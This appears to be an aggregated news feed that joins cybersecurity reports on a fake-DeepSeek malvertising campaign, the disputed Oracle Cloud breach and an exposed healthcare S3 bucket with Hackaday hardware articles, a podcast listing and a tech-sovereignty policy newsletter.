DeepSeek or DeepScam? When Google Gets You to Download a Virus with One Click!
DeepSeek’s rapid rise in popularity, amid privacy controversies, has drawn the attention not only of users but also of cybercriminals. Fake advertisements disguised as official Google search results have appeared online in an attempt to spread malware. The attackers targeted people who typed queries into a search engine and carelessly clicked on the first links.
According to research by Malwarebytes specialists, Google Ads is actively hosting fake ads posing as DeepSeek. At first glance, the differences from the real result are hard to spot, especially for an inexperienced user. A single click on such a link leads to a fake site built with particular attention to visual authenticity.
One of these sites completely copies the look of the official DeepSeek site, but actually leads to the download of a Trojan written in MSIL (Microsoft Intermediate Language). The malicious code is triggered when the visitor tries to download the “search engine” and is then launched on the victim’s system.
Fake DeepSeek website (Malwarebytes)
The criminals are counting on the credibility of sponsored results on Google. The system allows such ads to occupy the top positions, ranking even above brands’ official websites. This makes fake advertising particularly dangerous. The scammers pay considerable sums for placement, which shows how effective the deception is.
One of the fake sites was created in the name of an advertiser whose name is written in Hebrew: תמיר כץ. This is another red flag: such details are hard to notice in a hurry, especially if the user does not know what a genuine DeepSeek ad should look like.
Information about the malware advertiser (Malwarebytes)
To prevent infection, experts recommend avoiding clicking on sponsored links altogether. They also recommend clicking the three dots next to the URL in the search results, which reveals who owns the ad. If you have doubts about the advertiser’s name, it is better to go back to the regular search results.
Fake ads (top) and the real DeepSeek (bottom) (Malwarebytes)
To block sponsored links completely, you can install an ad blocker. This eliminates the risk of accidentally visiting a malicious site. In a situation where Google cannot guarantee the safety of advertisements, such measures become particularly relevant.
The article DeepSeek or DeepScam? When Google Gets You to Download a Virus with One Click! comes from il blog della sicurezza informatica.
Chase Light SAO Shouldn’t Have Used a 555, and Didn’t
Around these parts, projects needlessly using a microcontroller where a simpler design would do are often derided with the catch-all “Should have used a 555,” even if the venerable timer chip wouldn’t have been the ideal solution. But the sentiment stands that a solution more complicated than it needs to be is probably one that needs rethinking, as this completely mechanical chaser light badge Simple Add-On (SAO) aptly demonstrates.
Rather than choosing any number of circuits to turn a strip of discrete lights on and off, [Johannes] took inspiration for his chaser lights from factory automation mechanisms that move parts between levels on steps that move out of phase with each other, similar to the marble-raising mechanism used in [Wintergatan]’s Marble Machine X.
Two thin plates with notches around the edge are sandwiched together inside the 3D printed case of the SAO, between the face and the light source. A small motor and a series of gears rotate the two masks 180° out of phase with each other, which creates the illusion that the light is moving.
It’s pretty convincing; when we first saw the video below, we were sure it was a row of tiny LEDs around the edge of the badge.
Hats off to [Johannes] for coming up with such a clever mechanism and getting it working just in time for Hackaday Europe. If you need to catch up on the talks, we’ve got a playlist ready for you.
youtube.com/embed/bpqRJ9gQvO8?…
Pi Pico Turns Atari 2600 into a Lo-fi Photo Frame
The cartridge based game consoles of decades ago had a relatively simple modus operandi — they would run a program stored in a ROM in the cartridge, and on the screen would be the game for the enjoyment of the owner. This made them simple in hardware terms, but for hackers in the 2020s, somewhat inflexible. The Atari 2600 is particularly troublesome in this respect, with its clever use of limited hardware making it not the easiest to program at the best of times. This makes [Nick Bild]’s Atari 2600 photo frame project particularly impressive.
The 2600 has such limited graphics hardware that there’s no handy frame buffer to place image data into, instead there are some clever tricks evolved over years by the community to build up bitmap images using sprites. Only 64 by 84 pixels are possible, but for mid-70s consumer hardware this is quite the achievement.
In the case of this cartridge the ROM is replaced by a Raspberry Pi Pico, which does the job of both supplying the small Atari 2600 program to display the images, and feeding the image data in a form pre-processed for the Atari.
The result is very 8-bit in its aesthetic and barely what you might refer to as photos at all, but on the other hand making the Atari do this at all is something of a feat. Everything can be found in a GitHub repository.
If new hardware making an old console perform unexpected tricks is your bag, we definitely have more for you.
youtube.com/embed/uxBHm1ROvYI?…
DK 9x24 - 23AndMe
23AndMe, the recreational genetic mapping service, declares bankruptcy. The California Attorney General issues an appeal to all Californians to ask 23AndMe, under their state privacy law, to delete their data. Why? Where is the problem?
spreaker.com/episode/dk-9x24-2…
The Oracle Cloud Attack Mystery Continues, Between CVEs, a Handle on the Internet Archive, and Memes
Last week, a threat actor named ‘rose87168’ claimed to have breached Oracle Cloud servers and to have begun selling the alleged authentication data and encrypted passwords of 6 million users.
The threat actor also claimed that the stolen SSO and LDAP passwords could be decrypted using information in the stolen files, and offered to share some of the data with anyone who could help recover them. Oracle’s position has been to deny that its Oracle Cloud federated SSO login servers were breached and that the account data of 6 million people was stolen.
Many companies have confirmed that the data samples shared by the threat actor were valid. Oracle stated: “There has been no breach of Oracle Cloud. The published credentials are not for Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data.”
126,687 domains affected by the alleged breach
The companies stated that the associated LDAP display names, e-mail addresses, given names, and other identifying information were all correct and belonged to them. The threat actor released several text files consisting of a database, LDAP data, and a list of 140,621 domains of companies allegedly affected by the breach (126,687 after a group by). It should be noted that some of the company domains appear to be test domains and that there are multiple domains per company. As for Italian companies, there are as many as 1938 records among the domains affected by the alleged breach (1806 after grouping).
The threat actor also claims to have exchanged e-mails with Oracle to report having hacked the servers. “I carefully examined the cloud dashboard infrastructure and found a huge vulnerability that gave me full access to the information of 6 million users,” reads the e-mail, which was seen by BleepingComputer.
Cloudsek, as we saw in the previous article, also found an Archive.org URL showing that the server “login.us2.oraclecloud.com” was running Oracle Fusion Middleware 11g as of February 17, 2025. Oracle has since taken this server offline, after news of the alleged breach was reported.
Top 10 domains in the list of 126,687 domains
This version of the software was affected by a vulnerability tracked as CVE-2021-35587, which appears to have made it possible to compromise Oracle Access Manager. The threat actor claimed that this vulnerability was used in the alleged breach of Oracle’s servers.
The x.txt file recorded in the Internet Archive
The vulnerability used for this alleged breach appears to be CVE-2021-35587, which allowed the compromise of the server login[.]us2[.]oraclecloud[.]com. After denying the attack, Oracle quickly disconnected the server from the Internet.
The attacker also claims to have left a file, “x.txt”, with their handle written inside it when they breached the server “login.us2.oraclecloud[.]com”, and that this file was crawled and recorded in the Internet Archive on March 1, 2025.
This affair, still shrouded in mystery, has no clear explanation. It is certain that a giant like Oracle is still analyzing the facts and will soon publish an official report to shed light on what happened. In the meantime, some are handling the situation with irony, spreading memes that, at least based on the elements in our possession, seem easy to agree with.
rose87168 is shopping around for interest owners wanting to validate the @Oracle Cloud breach. It’s all about to finalize soon…Oracle: pic.twitter.com/Smx05YP2yt
— Ido Naor 🇮🇱 (@IdoNaor1) March 25, 2025
The article The Oracle Cloud Attack Mystery Continues, Between CVEs, a Handle on the Internet Archive, and Memes comes from il blog della sicurezza informatica.
An AWS S3 Misconfiguration Leads to the Exposure of 86,000 Healthcare Workers in 29 US States
A serious data leak recently occurred at ESHYFT, a healthcare technology company in New Jersey, USA.
The sensitive information of more than 86,000 healthcare workers was publicly exposed because of a misconfigured AWS S3 storage bucket. Cybersecurity researcher Jeremiah Fowler discovered that about 108.8 GB of data in the bucket was neither password-protected nor encrypted, leaving the personal information of a large number of healthcare workers accessible to the public.
The leaked sensitive information includes personally identifiable information (PII), such as facial photos, work schedules, professional certificates, medical documents, and so on, some of which may be protected by the US Health Insurance Portability and Accountability Act (HIPAA). The data concerns healthcare staff in 29 states, including nurses, nursing assistants, and others, which poses enormous privacy risks for the staff involved.
During the investigation, Fowler found that a folder named “App” in the S3 bucket stored 86,341 records, including users’ facial images, monthly work scheduling logs in CSV format, employment contracts, résumés, and so on.
One spreadsheet contained more than 800,000 entries detailing nurses’ internal IDs, workplaces, shift dates and times, and working hours, giving a complete picture of the healthcare workers’ activities.
Even more serious, the storage container also held some medical documents used to justify absences or sick leave. These documents contain information on diagnosis, prescription, and treatment, which could include HIPAA-protected content.
After discovering the exposed S3 bucket, Fowler immediately sent a responsible disclosure notice to ESHYFT, following the standard protocol of security researchers. However, despite the extreme sensitivity of the data, public access to the database was restricted more than a month after the initial notification.
After receiving the notification, ESHYFT responded only with a brief statement: “Thank you! We are actively investigating and looking for a solution.” It is not clear whether the S3 bucket was managed directly by ESHYFT or through a third-party contractor.
There is also no information on how long the data was exposed before being discovered, or on whether there was unauthorized access by third parties during the exposure period.
The article An AWS S3 Misconfiguration Leads to the Exposure of 86,000 Healthcare Workers in 29 US States comes from il blog della sicurezza informatica.
Why are Micro Center Flash Drives so Slow?
Every year, USB flash drives get cheaper and hold more data. Unfortunately, they don’t always get faster. The reality is, many USB 3.0 flash drives aren’t noticeably faster than their USB 2.0 cousins, as [Chase Fournier] found with the ultra-cheap specimens purchased over at his local Micro Center store.
Although these all have USB 3.0 interfaces, they transfer at less than 30 MB/s, but why exactly? After popping open a few of these drives the answer appears to be that they use the old-style Phison controller (PS2251-09-V) and NAND flash packages that you’d expect to find in a USB 2.0 drive.
Across the 32, 64, and 256 GB variants the same Phison controller is used, but the PCB has provisions for either twin TSOP packages or one BGA package. The latter package turned out to be identical to those found in the iPhone 8. Also interesting was that the two 256 GB drives [Chase] bought had different Phison chips, as in one being BGA and the other QFP. Meanwhile some flash drives use eMMC chips, which are significantly faster, as demonstrated in the video.
It would seem that you really do get what you pay for, with $3 “USB 3.0” flash drives providing the advertised storage, but you really need to budget in the extra time that you’ll be waiting for transfers.
youtube.com/embed/4avbFmmMFs8?…
Fitting a Spell Checker into 64 kB
By some estimates, the English language contains over a million unique words. This is perhaps overly generous, but even conservative estimates generally put the number at over a hundred thousand. Regardless of where the exact number falls between those two extremes, it’s certainly many more words than could fit in the 64 kB of memory allocated to the spell checking program on some of the first Unix machines. This article by [Abhinav Upadhyay] takes a deep dive on how the early Unix engineers accomplished the feat despite the extreme limitations of the computers they were working with.
Perhaps the most obvious way to build a spell checker is by simply looking up each word in a dictionary. With modern hardware this wouldn’t be too hard, but disks in the ’70s were extremely slow and expensive. To move the dictionary into memory it was first whittled down to around 25,000 words by various methods, including using an algorithm to remove all affixes, and then using a Bloom filter to perform the lookups. The team found that this wasn’t a big enough dictionary size, and had to change strategies to expand the number of words the spell checker could check. Hash compression was used at first, followed by hash differences and then a special compression method which achieved an almost theoretically perfect compression.
Although most computers that run spell checkers today have much more memory as well as disks which are orders of magnitude larger and faster, a lot of the innovation made by this early Unix team is still relevant for showing how various compression algorithms can be used on data in general. Large language models, for one example, are proving to be the new frontier for text-based data compression.
Integrated BMS Makes Battery Packs Easy
Lithium technology has ushered in a new era of batteries with exceptionally high energy density for a reasonably low cost. This has made a lot possible that would have been unheard of even 20 years ago such as electric cars, or laptops that can run all day on a single charge. But like anything there are tradeoffs to using these batteries. They are much more complex to use than something like a lead acid battery, generally requiring a battery management system (BMS) to keep the cells in tip-top shape. Generally these are standalone systems but [CallMeC] integrated this one into the buswork for a battery pack instead.
The BMS is generally intended to make sure that slight chemical imbalances in the battery cells don’t cause the pack to wear out prematurely. They do this by maintaining an electrical connection to each cell in the battery so they can charge them individually when needed, making sure that they are all balanced with each other. This BMS has all of these connections printed onto a PCB, but also included with the PCB is the high-power bus that would normally be taken care of by bus bar or nickel strips. This reduces the complexity of assembling the battery and ensures that any time it’s hooked up to a number of cells, the BMS is instantly ready to go.
Although this specific build is meant for fairly large lithium iron phosphate batteries, this type of design could go a long way towards making quick battery packs out of cells of any type of battery chemistry that typically need a BMS system, from larger 18650 packs or perhaps even larger cells like those out of a Nissan Leaf.
3D-Printed Scanner Automates Deck Management for Trading Card Gamers
Those who indulge in trading card games know that building the best deck is the key to victory. What exactly that entails is a mystery to us muggles, but keeping track of your cards is a vital part of the process, one that this DIY card scanner (original German; English translation) seeks to automate.
At its heart, [Fraens]’ card scanner is all about paper handling, which is always an engineering task fraught with peril. Cards like those for Magic: The Gathering and other TCGs are meant to be handled by human hands, and automating the task of flipping through them presents some challenges. [Fraens] uses a pair of motorized 3D-printed rollers with O-rings to form a conveyor belt that can pull one card at a time off the bottom of a deck. An adjustable retaining roller made from the most adorable linear bearing we’ve ever seen ensures that only one card at a time is pulled from the hopper onto an imaging platen. An adjustable mount holds a smartphone to take a picture of the card, which is fed into an app that extracts all the details and categorizes the cards in the deck.
Aside from the card handling mechanism, there are some pretty slick details to this build. The first is that [Fraens] noticed that the glossy finish on some cards interfered with scanning, leading him to add a diffused LED ringlight to the rig. If an image isn’t scannable, the light goes through a process of dimming and switching colors until a good scan is achieved. Also, to avoid the need to modify the existing TCG deck management app, [Fraens] added a microphone to the control side of the scanner that listens for the sounds the app makes when it scans cards. And if Magic isn’t your thing, the basic mechanism could easily be modified to scan everything from business cards to old family photos.
youtube.com/embed/dl2RyKrg4pI?…
FLOSS Weekly Episode 826: Fedora 42 and KDE
This week, Jonathan Bennett chats with Neal Gompa about Fedora 42 and KDE! What’s new, what’s coming, and why is flagship status such a big deal?
- Website: neal.gompa.dev/
- GitHub Sponsors: github.com/sponsors/Conan-Kudo
- Neal’s business (Velocity Limitless): velocitylimitless.com/
- Neal’s podcast (Sudo Show): tuxdigital.com/sudoshow
youtube.com/embed/xwgqPwsjd0g?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/26/floss-…
Supercon 2024: A New World of Full-Color PCBs
Printed circuit boards were once so simple. One or two layers of copper etched on a rectangular fiberglass substrate, with a few holes drilled in key locations so components could be soldered into place. They were functional objects, nothing more—built only for the sake of the circuit itself.
Fast forward to today, and so much has changed. Boards sprout so many layers, often more than 10, and all kinds of fancy geometric features for purposes both practical and pretty. But what catches the eye more than that, other than rich, saturated color? [Joseph Long] came to the 2024 Hackaday Supercon to educate us on the new world of full color PCBs.
youtube.com/embed/LOSMH_EV6pQ?…
[Joseph] begins his talk with an explanation of terminology. We often look at a PCB and cite its color—say, green for example. As [Joseph] explains, the color comes from the solder mask layer—so called for its job in ensuring solder can only go where it’s supposed to go. The solder mask sits atop the copper layer, but beneath the silk screen which has all the component outlines and part labels.
Solder mask was traditionally green, and this is still the most common color you’ll find in the majority of electronics. However, in recent decades, the available gamut of colors has increased. Now, you can routinely order yellow, blue, purple, and red solder masks quite easily, as well as black or white if you’re so inclined. As some creative makers have found, when designing a board, it’s possible to get several colors into a design even if you’re just using one color of solder mask. That’s because the solder mask appears in slightly different shades when it’s laid over the bare fiberglass of the PCB, versus being laid over copper, for example. Add in white silkscreen and you’ve got quite a lot to work with.
Different colors are achievable on a PCB even just by using a single soldermask color.
We’re used to having a choice of color on our PCB orders today, but so much more is possible.
But what if you want more? What if you want real color? [Joseph] realized this could be possible when he found out that PCB board houses were already using inkjet-like printers to lay down silkscreen layers on small-run boards. Since there was already a printer involved in the board production process, wouldn’t it be simple to start printing on circuit boards in full color?
As it turns out, this was very practical. Two big Shenzhen board houses—JLCPCB and PCBWay—both started delivering color printed boards in 2024. The method involved using a white solder mask layer, with a full-color “silkscreen” layer printed on top using UV-cured ink. Using this ink was a particular key to unlocking full color PCBs. The UV-cured inks are more robust under the tough conditions PCBs face, such as the high temperatures during reflow or hand soldering.
Color printing PCBs might sound trivial and only relevant for cosmetic purposes, but [Joseph] points out it has lots of practical applications too. You can easily color code pinouts and traces right on the board, a feature that has obvious engineering value. You can even use photorealistic footprints to indicate where other board-level modules should be soldered in, too, making assembly more intuitive. Plus, full color boards are fun—don’t discount that!
[Joseph] likes using the full-color prints to aid in assembly, by using far more realistic footprints for items like board-scale modules and batteries.
[Joseph] is also a big fan of the SAO format, having designed several compatible boards himself. At his talk, he showed off special “extender” boards of his own creation and offered giveaways to attendees.
If you’re wondering how to get started, [Joseph]’s talk covers all the important ground. He goes over the workflow for doing color PCBs with typical board houses. As the main suppliers in this area, PCBWay and JLCPCB both have slightly different ways of working with design files for color boards. Obviously, creating a color board involves making images outside of your traditional board design software. It’s straightforward enough, but you have to follow some careful practices to ensure your images are printed in the right size and right orientation to match the rest of your PCB design. PCBWay lets you make your own images and submit them with your Gerber files from whatever board design tool, while JLCPCB requires you to produce your PCB within their EasyEDA design software and put the graphics directly in there. [Joseph] also explains the costs involved for printing these boards, which does come at a premium relative to traditional boards.
As a bonus, we even get to see some of Joseph’s awesome color boards. The graphics are stunning—they really show the potential of full-color PCBs and how they can elevate a project or a fun badge design. If you’re eager to try this out, go ahead and watch [Joseph]’s primer and dive in for yourself!
Teardown of Casio Credit Card-Sized Radio
These days we don’t get too fussed about miniaturized electronics, not when you can put an entire processor and analog circuitry on a chip the size of a grain of sand. Things were quite different back in the 1980s, with the idea of a credit card-sized radio almost preposterous. This didn’t stop the engineers over at Casio from having a go at this and many other nutty ideas, with [Matt] from Techmoan having a go at taking one of these miniaturized marvels apart.
The Casio FM Stereo radio in happier days. (Credit: Techmoan, YouTube)
On the chopping block is the FM stereo device that was featured in a previous episode. Out of the four credit card-sized radios in that video, the one with the rechargeable battery (obviously) had ceased to work, so it was the obvious choice for a teardown. This mostly meant peeling off the glued-on top and bottom, after which the circuitry became visible.
In addition to the battery with a heavily corroded contact, the thin PCB contains a grand total of three ICs in addition to the analog circuitry. These were identified by [Spritetm] as an AM/FM tuner system IC (TA7792), an FM PLL MPX (TA7766AF) and a headphone amplifier (TA7767F), all of them manufactured by Toshiba.
Although [Matt] reckons this was a destructive teardown, we’re looking forward to the repair video where a fresh cell is soldered in and the case glued back together.
youtube.com/embed/XX_wOOvByPs?…
Tech in Plain Sight: Hearing Aids
You might think you don’t need a hearing aid, and you might be right. But in general, hearing loss eventually comes to all of us. In fact, you progressively lose hearing every year, which is why kids can have high-pitched ringtones their parents can’t hear.
You’d think hearing aids would be pretty simple, right? After all, we know how to pick up sounds, amplify them, and play them back. But there’s a lot more to it. Hearing aids need to be small, comfortable, have great battery life, and cram a microphone and speaker into a small area. That also can lead to problems with feedback, which can be very uncomfortable for the user. In addition, they need to handle very soft and loud sounds and accommodate devices like telephones.
Although early hearing aids just made sound louder and, possibly, blocked unwanted sound, modern devices will try to increase volume only in certain bands where the user has hearing loss. They may also employ sophisticated methods to block or reduce noise.
A Brief History
Hearing loss is nothing new. Ear trumpets appeared around the 17th century. These were just simple sound baffles that directed sound to your ear and, perhaps, cut some noise out that wasn’t in the trumpet’s direction.
The modern hearing aid dates back to the akouphone in 1895. [Miller Hutchison] developed the device for a friend who was deaf from a bout of scarlet fever. It was bulky — sitting on a table top — and used a carbon microphone, but it did work. He was also able to sell several models to royalty, many of whom suffered from hereditary deafness. This included Denmark’s Queen Alexandra, who, reportedly, was very impressed with the results.
The Acousticon microphone (left) and complete unit (right) (From Hawkins Electrical Guide #7, 1923)
Around 1902, [Hutchison] changed the device’s name to the acousticon, making it more portable with battery power. Despite impressive marketing, not all medical professionals were sold. If you were totally deaf, the device did nothing, unsurprisingly. In addition, the bulky batteries required frequent replacement, and the frequency response was poor.
It was still better than nothing, and the invention also led to the massacon and akoulalion that converted sound into vibration for the profoundly deaf. He later sold the rights for the acousticon to [Kelley Turner], who would not only improve the device, but also use the technology to launch the dictograph, which was a well-known office machine for many years.
Modern Times
The Zenith Miniature 75 (photo by [France1978] CC-BY-SA-2.0).
Amplified hearing aids appeared around 1913, but they were still large boxes. By 1920, the vactuphone used vacuum tubes to perform amplification. At “only” seven pounds, the vactuphone was considered quite portable.
Keep in mind that “portable” was a relative term for hearing aids in the 1920s. Typically, you’d have a unit carried in a bag or hung around your neck. World War II brought advances in miniaturization which benefited hearing aids like the Zenith Miniature 75.
Transistors, of course, changed everything, including hearing aids. The Sonotone 1010, which appeared in 1952, used both transistors and tubes. Early transistor units were known to fail early due to moisture and heat. Silicon transistors and encapsulation helped.
Naturally, all of these hearing aids were analog as were the earliest IC-based devices. However, with the advent of ICs, it was possible to use digital techniques.
Patent drawing from 1984 — Hardly portable!
The path to digital hearing aids was difficult. In the 1970s, large computers could program digital elements in hearing aids to tune the device to set frequency bands and gains.
By 1980, several groups were experimenting with real digital hearing aids, although many of them had wireless links to real computers. A fully digital hearing aid first appeared in a 1984 patent, but it wasn’t tiny. Since then, things have gotten smaller and more capable.
Physical Form
Hearing aids went from table-top devices to boxes hanging on necks. Getting smaller devices allowed for small boxes that hug the back of the ear, with the earpiece going into the ear canal.
With even smaller devices, the entire apparatus can be placed in the ear canal. Many of these go so deeply into the ear that they are largely invisible. There are also hearing aids that can surgically attach to your skull using a titanium post embedded in the bone. This can transmit sound even to people who can’t hear sound directly since it relies on bone conduction.
Other places to find hearing aids are built into thick glasses frames. Doctors with hearing problems can opt for stethoscopes with integrated hearing aids.
Modern hearing aids sometimes have rechargeable batteries. Otherwise, there will be some kind of small battery. There was a time that mercury cells were common, but with those banned in most places, many aids now take zinc-air batteries that deliver about 1.4 V.
We hear from an 8th grader that you can make hearing aid batteries last longer by peeling the sticker from them and waiting five minutes before installing them. Apparently, giving them a little time to mix with the air helps them.
What’s Next?
On the market today are hearing aids that use neural networks, have Bluetooth connections, and use other high tech tricks. We’ve looked at the insides of a hearing aid and why they cost so much before. If you want to roll your own, there is an open source design.
Rethinking tech sovereignty
THIS IS DIGITAL POLITICS. I'm Mark Scott, and I continued my Euro-trash existence this week in Geneva, where I moderated a panel on March 24 on tech sovereignty and data governance. I'll include a write-up in next week's newsletter.
Talking of events, I'll also be co-hosting a tech policy meet-up in hipster East London on March 27 at 6:30pm. There are a few spots left for this (free) event. Sign up here.
— We're living through an era of 'tech sovereignty.' No one knows what that concept means — and that's quickly turning into a problem.
— Brussels forced Apple to open up to competitors. That's going to help many US firms that, in principle, oppose the bloc's competition revamp.
— In what must be the least-shocking fact about the latest AI models, almost none of the data used to train these systems comes from Global Majority countries.
Let's get started.
Tech sovereignty in an era of zero-sum geopolitics
MAYBE IT'S BECAUSE I WAS IN SWITZERLAND to talk about this topic, but we need to focus on tech sovereignty. Bear with me. For most of us, this concept is either unknown or irrelevant. Or possibly both. But over the last five years, policymakers and lawmakers — first in Europe, but increasingly everywhere — have embraced this catch-all term for efforts by individual governments to regain control over parts of the technology industry that have historically been left to the private sector.
Think the United States (or European Union) Chips Act, or efforts to bring back high-end semiconductor manufacturing to the "homeland." Think Washington's Joe Biden-era export controls to stop Beijing getting hold of next generation chip manufacturing equipment. Think Brussels' litany of initiatives — from the creation of so-called 'data spaces' to the (badly named) AI 'gigafactories' — to give itself a seat at the global table of tech powers.
At its core, tech sovereignty is a realization by elected officials that they are no longer in control. They see complex technological global supply chains, the rise of world-spanning tech giants and the influx of billions of dollars in private capital and worry their voters (and homegrown companies) won't see the economic and social benefits of how tech has become so ingrained in everything from buying a car to sending your child to school.
Well, maybe that's one (slightly cynical) definition. After more than five years since 'tech sovereignty' became a thing, governments are still grappling with exactly what it means, how to implement it and what the consequences will be when everyone from London to Brasilia wants to "onshore" tech to boost their local interests.
Before 2025, that remained almost exclusively a headache for uber-policy types (like myself.) But this year has shown, already, that we are living in a more transactional, zero-sum mercantilist world where all elected leaders — and not just US President Donald Trump — are willing to use all the levers at their disposal to reshape the world order to their needs.
That means, inevitably, revisiting how we define 'tech sovereignty' because, like it or not, how we collectively approach the topic will have significant real-world implications for how technology is developed, governed and used in the years to come.
If done well, it could build upon the core tenets of what made the internet such a game-changing technology: open, rights-based core infrastructure that allowed anyone (read: with money and technical capacity) to build whatever they wanted, however they wanted.
If done poorly, it could undermine those key principles that have made technology crucial to both economic and social benefits for all.
Case in point: if a country decides to keep all of its citizens' data within national borders — a term known as data localization — for either commercial or national security reasons, then it makes it harder to trade, based on a reduction of global data flows, and starts to cut off specific countries from the now-fraying world order. This is not hypothetical: Russia, Nigeria, India and China are among states that already have such rules on the books.
What is urgently needed is an honest conversation about what people mean by 'tech sovereignty.' Currently, that falls into two camps.
Camp One leans toward isolationism. In this world, politicians funnel public cash into homegrown 'tech champions' that use siloed-off local data and technical skills to create services/products that are then sold worldwide in a race to build global giants.
Camp Two relies on each country shifting to tech-related areas where it can compete globally (eg: Taiwan/South Korea on microchips; Vietnam on device manufacturing), and then opening up each market to overseas competition. The goal isn't to own everything in tech. It's about figuring out where you can compete, globally, while giving local citizens access to (cheap) outside services/products that improve their daily lives.
You can probably figure out which version of 'tech sovereignty' would be my preference.
Before I get angry emails, I realize there's a lot of nuance that lies between those two extreme positions. Those who want to create a so-called "Euro stack," for instance, would probably argue their efforts are about giving Europe greater autonomy at a time when the US is not perceived as a trusted partner. Those in Brazil supportive of the country's data localization mandate would likely say such provisions are about keeping locals' personal information safe under national laws.
I get it. Everyone has a reason why their version of "tech sovereignty" is OK, while everyone else's take is blatant protectionism.
But here's the problem with that. This ongoing nibbling at what has made technology an inherent force for good (despite, ahem, some significant downsides) has placed increased onus on equating national power as the only mechanism to get things done. That is especially true, in 2025, when long-standing allies are starting to not trust each other, and retaliatory tariffs are leading us toward a potential global trade war.
What I would prefer to see is a recognition by lawmakers about what they can — and what they can not — change when it comes to tech. Yes, much of the current global power dynamics mean the likes of the US, China and Europe have more say than other parts of the globe. That is not something, unfortunately, that will change overnight.
But while it's 100 percent legitimate for national leaders to want greater control of various forms of technology, I don't see the ubiquitous calls to spend public money to "bring back" global supply chains to national shores as something that will achieve that.
First, it won't — given that these complex systems have grown over decades and won't just change quickly. And second, it will lead to short-term higher prices for consumers because of the inevitable cost hikes that will result from spending over the odds to onshore manufacturing when other countries can just do it cheaper (and faster.)
"Tech sovereignty" is a concept that sounds good as a talking point, but fails to deliver when confronted with reality. Yes, some form of greater control (or, at least, the semblance of control) over global tech forces is probably good for democracy, writ large. That's especially true for countries beyond the US and China that are net-takers of technology on the global stage.
But you don't achieve that by putting up barriers to outsiders and investing public funds to develop clunky national champions that will struggle to compete worldwide.
What would be better is to set out a positive definition of 'tech sovereignty' that builds on what has worked for almost everyone over the last 80 years. Caveat: I understand that is a difficult pitch, politically, given the current geopolitical climate.
That would include: reaffirming open global markets based on rights-based digital regulation that allows each country to 1) promote their own unique tech-related specialisms, both home and abroad and 2) allow national lawmakers to step in, where appropriate, when global tech forces undermine the rule of law or other key tenets within a nation state.
We already have such systems in other sectors like financial services and pharmaceuticals — and no one (at least not yet in 2025!) makes much political capital in undermining how those industries currently operate. Yes, tech is somewhat different as it's nominally not a separate industry. But, I would argue, neither is financial services.
Unfortunately, I don't see that positive agenda in any of the ongoing 'tech sovereignty' discussions that have become embedded in the geopolitical tensions of early 2025. That goes from Trump's MAGA approach to maintaining "US dominance" over AI to European Commission president Ursula von der Leyen's pitch to make the EU the hub for the next technological revolution.
That is a shame.
It's a shame because it undermines what has been built over the last 80 years in so many tech-related fields that have benefited so many people worldwide. And it's a shame because it equally foretells a growing "splinternet" between countries/regions that solely focus on their short-term interests — without recognizing what damage that will produce over the mid-term.
Chart of the Week
THE LATEST ARTIFICIAL INTELLIGENCE MODELS already skew toward more developed countries. But researchers analyzed the most common datasets used to build these systems, from 1990 to 2024, to figure out where that information actually came from.
Not surprisingly, regions like Africa and South America were massively underrepresented, both on the number of datasets (see "by count" below) from those regions and the amount of information (see "by tokens or hours" below) included from those parts of the world.
That's a problem when next generation AI models are being rolled out globally in ways that won't meet regionally-specific needs because of a lack of local data baked into these complex systems.
The darker the part of the maps below, the more data was used from that region to train AI models.
Source: The Data Provenance Initiative
The complexities of antitrust enforcement
WHEN THE EUROPEAN COMMISSION ANNOUNCED last week it had forced Apple to make changes to comply with the bloc's new competition rules, the iPhone maker was quick to cry foul. The decision, according to the company, "wraps us in red tape, slowing down Apple's ability to innovate for users in Europe and forcing us to give away our new features for free to companies who don't have to play by the same rules."
Yet in many parts of the global tech world — including inside companies that equally dislike the EU's Digital Markets Act — there were cheers of victory. The split response highlights how these new competition rules, which allow European regulators to step into online markets before one specific company becomes too dominant, aren't as easy to define as many first thought.
First, a quick backstory. Last year, the European Commission's competition enforcers opened an investigation into how Apple allowed rival firms to interact with its products. On March 19, Brussels then ordered the iPhone maker to make it easier for non-Apple devices to connect to the company's products. It also demanded that the Cupertino-based firm provide its technical specs to outsiders so they could build services which more easily interact with Apple's operating systems.
What does that mean? Over the next 12 months (caveat: Apple may still appeal these changes), it will become easier, say, for Garmin smartwatches to connect seamlessly with your iPhone — just as an Apple watch currently does. Rival apps will also be able to take advantage of Apple's technical wizardry to compete more directly with the company's own services that work hand-in-glove with its in-house software.
You can understand why Apple is not a fan. But, equally, it will be a boon for the likes of Meta and Alphabet, as well as scores of smaller tech firms, that have long complained that Apple creates artificial technical barriers so that rival devices/apps just don't work as well as the iPhone maker's own offerings. Mark Zuckerberg, Meta's chief executive, even called out Apple in January over how it didn't allow other headphones to connect as well as the firm's (expensive) devices.
Yes, you read that right. The European Commission and Zuckerberg are on the same page when it comes to digital competition.
That complexity can make my brain hurt. In the ongoing lobbying around new digital competition rules (looking at you, United Kingdom), the playbook often relies on claiming such legislation places regulators too squarely at the heart of business decisions of some of the world's largest tech companies. "It's killing innovation!," comes the claim. "Officials should keep their noses out of our business!"
I have some sympathy for that argument, especially when it comes to so-called ex ante regulation, or policy efforts to curb unfair dominance before a firm becomes too entrenched in a digital market. But I can also see a massive upside for consumers if a non-Apple product/service works as effortlessly as an in-house device designed in Cupertino.
For what such competition decisions lead to, we only have to look at a previous European Commission ruling to force the iPhone maker to switch all of its devices over to USB-C technology. Apple executives equally met that 'common charger' ruling with derision. But now, USB-C is the de facto global standard, allowing one cable to connect everything from iPhones to Samsung tablets.
It's still unclear if the recent Apple decision will lead to US pushback after the White House threatened retaliatory tariffs on countries/regions that went after American tech firms. But beyond the iPhone maker, many US companies remain supportive of this specific European Commission competition decision — mostly because it's good for their own business interests.
What I'm reading
— A subcommittee of the US Senate Committee on the Judiciary will hold a hearing on the "Censorship Industrial Complex" on March 24. Watch along here. A counterpoint to that subcommittee's focus.
— Company responses to the White House's call for input on an "AI Action Plan." Palantir. OpenAI. Alphabet. Microsoft. Frontier Model Forum. Anthropic. If anyone has seen Meta's submission, please let me know.
— AI Now gives the European Commission a report card on tech for the Berlaymont Building's first 100 days. More here.
